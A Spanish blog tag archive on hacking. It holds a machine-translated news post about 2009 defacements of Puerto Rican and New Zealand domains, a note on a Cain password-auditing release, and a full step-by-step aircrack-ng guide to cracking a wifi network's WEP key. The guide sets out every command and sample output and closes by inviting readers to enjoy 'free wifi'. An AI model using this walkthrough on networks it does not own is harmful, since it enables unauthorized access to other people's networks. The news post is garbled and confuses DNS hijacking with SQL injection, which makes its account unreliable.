Tag Archive: Hack



A las 7.00 de la mañana, comencé con la rutina de prender el computador para ver los cambios de seo en diferentes googles de latino América. Pero Grande fue mi sorpresa al ver la página de google.com.pr (google puerto rico) Hackeado.

No lo puede creer a si que me puse a investigar y Me entere de que no solo fue google sino que también esta yahoo, Hotmail y otras paginas similares a los mencionados. con gran trafico. Todos estos defaces se hicieron en dominios .pr con servidores localizados en puerto rico y sitios extranjeros…

Es el equipo de la paz, conocido antes como equipo del terrorista, un grupo de piratas informáticos político motivados que apoyan la causa Palestina, que desfiguró recientemente los sitios de Microsoft Nueva Zelandia. A principios de este año, atacaron un número de Web site de la OTAN y de los militares de los E.E.U.U.

El carácter principal del equipo de la paz es pirata informático conocido como Agd_Scorp, alegado del origen turco. Otros los miembros prominentes son rx5 y Cr@zy_King.

No sé apenas fueron exactamente alrededor este corte, pero parece tener algo hacer con la modificación de los expedientes del DNS de los dominios cortados, que en efecto vuelve a dirigir a visitantes de la perspectiva a un sitio diseñado por los piratas informáticos. Esta hazaña particular se conoce como “vulnerabilidad de la inyección del SQL”.
Fuentes:
Corte de Microsoft NZ:
http://w0rm.us/tag/peace-crew
http://www.nzherald.co.nz/technology…d=5&objectid=1..

Corte de la OTAN:
http://news.softpedia.com/news/Pales…TO-and-U-S-Arm..

Tipos de registro del DNS:
http://en.wikipedia.org/wiki/List_of_DNS_record_types

Inyección del SQL:
http://en.wikipedia.org/wiki/SQL_injection

Microsoft, HSBC, Sony, Coca-Cola (…) Nueva Zelandia Hackeado – ACTUALIZADO

21/04/2009 (Actualizado)

Hoy anterior algunos defacers turcos se rompieron en el secretario basado Nueva Zelandia Domainz.net (que pertenece a MelbourneIT) y volvieron a dirigir algunos de los Web site del alto nivel de sus clientes a un servidor de los terceros con una página desfigurada. Compañías que hicieron sus Web site de Nueva Zelandia desfigurar para incluir Microsoft, HSBC, Coca-Cola, F-seguro, Bitdefender, Sony y Xerox.

Anuncios

Nuevas versiones de viejas amigas

Hay algunas herramientas que se instalan por defecto en todos los ordenadores que van pasando por tu vida. Son esas herramientas que, para cada uno, deberían estar instaladas por defecto en el sistema operativo. Para algunos es el Winrar, para otros el interprete Perl, para otros las herramientas de Sysinternals porque no saben vivir sin el Filemon y el Process Explorer, otros echan de menos las herramientas de cifrado y necesitan su PGP, su SecWay para cifrar las conexiones de messenger y para alguno es su navegador favorito con sus plug-ins de pentesting. Estas tres que os dejo aquí son algunas de las que están en el mio desde que las conozco.

Cain
Versión 4.9.2 [Nov 2008]
URL: http://www.oxid.it/projects.html

Ha sacado una versión con novedades con respecto a las auditorias de Oracle. La nueva versión trae herramientas para la extracción de la passwords de conexiones ODBC, para la captura y el ataque de hashes capturados vía Sniffer y una nueva herramienta para lanzar consultas a través de conexiones ODBC [ésta última en fase experimental, pero muy interesante]. Además, el trabajo de análisis para el ataque de hashes de passwords Oracle capturadas están publicados unos Papers muy chulos. Como se puede ver, la herramienta se torna cada día más práctica en las auditorías de seguridad de red interna.


Cain 4.9.

fuente:

http://elladodelmal.blogspot.com

Abajo Estan los Links De descarga!

Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive y nuestro pequeño Asus Eee(lap top) utilizando Windows xp.

El autor del texto menciona que en 20 min. logro conectarse completamente y sin ningun problema.

Start…

Requisitos previos:

Necesitaremos el Backtrack 3 versión USB: Descargar desde aqui.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

En windows vamos al menu de inicio > ejecutar > cmd

Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

Bien, ahora empieza lo divertido…

Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.

Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.

Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.

Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

PASO 1:

NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

En una terminal pones:

airmon-ng start wifi0

a continuación:

airodump-ng ath1

cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1

donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.

PASO 2:

Abre una nueva terminal, ya sabes como…

aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

Si te sale esto felicidades:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Si no, intenta con lo siguiente:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

Y te debería salir algo como esto:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Si no, olvidate.

Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…

PASO 3:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

Espera hata tener unos 40.000 más o menos y abre una tercera terminal.

PASO 4:

Quiero mi clave yaaaarl!!!

aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.

Fuente:
http://foro.hackhispano.com/showthread.php?t=31146